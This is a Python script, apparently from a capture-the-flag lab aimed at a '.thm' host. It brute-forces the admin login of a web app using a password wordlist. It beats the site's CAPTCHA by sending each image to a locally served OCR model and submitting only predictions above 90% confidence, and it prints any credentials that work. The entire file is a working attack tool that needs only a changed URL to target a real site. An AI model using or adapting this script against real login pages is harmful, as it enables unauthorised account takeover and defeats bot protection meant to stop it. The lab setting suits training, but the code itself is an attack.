83 lines
2.9 KiB
Python
83 lines
2.9 KiB
Python
|
#!/usr/bin/env python3
|
||
|
import requests
|
||
|
import base64
|
||
|
import json
|
||
|
from bs4 import BeautifulSoup
|
||
|
|
||
|
username = 'admin'
|
||
|
passwords = []
|
||
|
|
||
|
# URLs for our requests
|
||
|
website_url = 'http://hqadmin.thm:8000'
|
||
|
model_url = 'http://localhost:8501/v1/models/ocr:predict'
|
||
|
|
||
|
# Load in the passwords for Brute Forcing
|
||
|
with open('passwords.txt', 'r') as wordlist:
|
||
|
lines = wordlist.readlines()
|
||
|
for line in lines:
|
||
|
passwords.append(line.replace('\n', ''))
|
||
|
|
||
|
access_granted = False
|
||
|
count = 0
|
||
|
|
||
|
# Run the Brute Force Attack until we are out of passwords or have gained access
|
||
|
while(access_granted == False and count < len(passwords)):
|
||
|
# Run a Brute Force for each password
|
||
|
password = passwords[count]
|
||
|
|
||
|
# Connect to webapp to get the CAPTCHA.
|
||
|
# We use a session so the cookies are taken care of for us.
|
||
|
sess = requests.session()
|
||
|
r = sess.get(website_url)
|
||
|
|
||
|
# Use soup to parse the HTML and extract the CAPTCHA image.
|
||
|
soup = BeautifulSoup(r.content, 'html.parser')
|
||
|
img = soup.find('img')
|
||
|
encoded_image = img['src'].split(' ')[1]
|
||
|
|
||
|
# Build the JSON request to send to the CAPTCHA predictor
|
||
|
model_data = {
|
||
|
'signature_name' : 'serving_default',
|
||
|
'inputs' : {'input' : {'b64' : encoded_image} }
|
||
|
}
|
||
|
|
||
|
# Send the CAPTCHA prediction request and load the response
|
||
|
r = requests.post(model_url, json=model_data)
|
||
|
prediction = r.json()
|
||
|
probability = prediction['outputs']['probability']
|
||
|
answer = prediction['outputs']['output']
|
||
|
|
||
|
# Increase our guessing accuracy by only submitting the answer if we are more than 90% sure
|
||
|
if (probability < 0.90):
|
||
|
# If lower than 90%, no submission of CAPTCHA
|
||
|
print('[-] Prediction probability to low, not submitting CAPTCHA')
|
||
|
continue
|
||
|
|
||
|
# Otherwise, submit the answer in a POST data
|
||
|
# Build the POST data
|
||
|
website_data = {
|
||
|
'username' : username,
|
||
|
'password' : password,
|
||
|
'captcha' : answer,
|
||
|
'submit' : 'Submit+Query'
|
||
|
}
|
||
|
|
||
|
# Submit our Brute Force Attack
|
||
|
r = sess.post(website_url, data=website_data)
|
||
|
|
||
|
# Read the response and interpret the results of the attempt
|
||
|
response = r.text
|
||
|
|
||
|
# If the response tells us that we have submitted the wrong CAPTCHA, we try again with this password
|
||
|
if ('Incorrect CAPTCHA value supplied' in response):
|
||
|
print('[-] Incorrect CAPTCHA value was supplied. We will resubmit this password')
|
||
|
continue
|
||
|
# If the response tells us that we have submitted the wrong password, we can try with the next password
|
||
|
elif ('Incorrect Username or Password' in response):
|
||
|
print('[-] Invalid credentials -- Username ' + username + ' Password: ' + password)
|
||
|
count += 1
|
||
|
# Otherwise, we have found the correct password!
|
||
|
else:
|
||
|
print ('[+] Access Granted! -- Username: ' + username + ' Password: ' + password)
|
||
|
access_granted = True
|